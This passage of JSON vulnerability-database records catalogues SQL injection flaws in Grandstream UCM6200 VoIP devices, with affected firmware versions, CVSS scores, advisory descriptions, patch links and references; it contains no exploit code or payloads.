            "trust": 0.1,
            "url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
          },
          {
            "trust": 0.1,
            "url": "http://www.grandstream.com/\","
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "date": "2020-03-23T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "date": "2022-01-25T16:34:16",
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "date": "2020-03-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "date": "2020-04-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "date": "2020-03-23T20:15:12.043000",
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-23201"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5722"
          },
          {
            "date": "2022-01-26T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          },
          {
            "date": "2020-04-07T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          },
          {
            "date": "2025-10-31T22:11:59.510000",
            "db": "NVD",
            "id": "CVE-2020-5722"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "165708"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003190"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1337"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1437

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches for IP telephone communication from the US company Grandstream. The vulnerability stems from database-backed applications failing to validate externally supplied input used in SQL statements. Attackers can use this vulnerability to execute illegal SQL commands.

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1437",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          }
        ]
      },
      "cve": "CVE-2020-5724",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5724",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003469",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-20680",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5724",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003469",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5724",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003469",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-20680",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1714",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-5724",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5724",
            "trust": 3.1
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "id": "VAR-202003-1437",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.363000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.grandstream.com/"
          },
          {
            "title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-20680)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/211859"
          },
          {
            "title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113109"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-89",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5724"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5724"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/89.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-03-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "date": "2020-03-30T20:15:20.087000",
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-05-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20680"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5724"
          },
          {
            "date": "2020-04-16T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          },
          {
            "date": "2024-11-21T05:34:29.297000",
            "db": "NVD",
            "id": "CVE-2020-5724"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Grandstream UCM6200 In the series  SQL Injection vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003469"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "SQL injection",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1714"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202003-1439

    Vulnerability from variot - Updated: 2024-11-23 22:25

    The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1439",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "ucm6204",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6202",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6204",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6208",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          },
          {
            "model": "ucm6200",
            "scope": "lt",
            "trust": 0.6,
            "vendor": "grandstream",
            "version": "1.0.20.22"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-24401"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5726"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6202_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6204_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003471"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Jacob Baines",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1716"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2020-5726",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5726",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003471",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-24401",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5726",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 7.5,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003471",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5726",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
